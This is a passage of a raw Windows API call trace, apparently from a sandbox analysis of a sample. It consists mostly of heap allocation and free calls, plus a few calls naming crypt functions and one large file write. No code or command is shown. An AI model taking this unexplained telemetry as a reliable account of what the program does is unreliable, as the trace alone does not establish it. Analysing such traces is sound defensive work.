Size=0xc) returned 0x2e50980 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0205.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0205.891] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0205.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0205.891] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0205.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0205.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0205.891] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0205.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0205.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0205.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0205.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0205.891] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0205.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0205.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0205.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0205.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0205.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0205.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0205.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0205.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0205.891] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0205.891] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0205.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0205.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0205.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0205.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0205.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0205.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0205.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0205.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0205.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0205.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0205.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb008) returned 0x2e8b340 [0205.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0205.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb008) returned 0x2ea1360 [0205.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0205.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0205.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8b340 | out: hHeap=0x970000) returned 1 [0205.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0205.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0205.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb008) returned 0x2e8b340 [0206.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea1360 | out: hHeap=0x970000) returned 1 [0206.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0206.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0206.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb008) returned 0x2ea1360 [0206.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8b340 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0206.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0206.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0206.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0206.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0206.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0206.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0206.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0206.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0206.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0206.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0206.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0206.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0206.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0206.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0206.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0206.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0206.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0206.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3a028 | out: hHeap=0x970000) returned 1 [0206.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0206.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0206.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0206.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0206.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0206.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e96350 | out: hHeap=0x970000) returned 1 [0206.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0206.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0206.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0206.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0206.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0206.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0206.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0206.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0206.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0206.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0206.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0206.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0206.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0206.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0206.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0206.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0206.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0206.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0206.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0206.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2f020 | out: hHeap=0x970000) returned 1 [0206.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0206.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0206.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb008) returned 0x2e80330 [0206.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea1360 | out: hHeap=0x970000) returned 1 [0206.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0206.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0206.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0206.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0206.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0206.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0206.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0206.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0206.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0206.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0206.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0206.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0206.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb008) returned 0x2f24018 [0206.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0206.038] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f24018*, nNumberOfBytesToWrite=0xb008, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24018*, lpNumberOfBytesWritten=0x8cf5e4*=0xb008, lpOverlapped=0x0) returned 1 [0206.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0206.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0206.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0206.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0206.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0206.043] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0206.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0206.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0206.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0206.043] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0206.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0206.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0206.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0206.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0206.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0206.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0206.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0206.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0206.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0206.044] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0206.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0206.045] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0206.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0206.045] RtlAllocateHeap 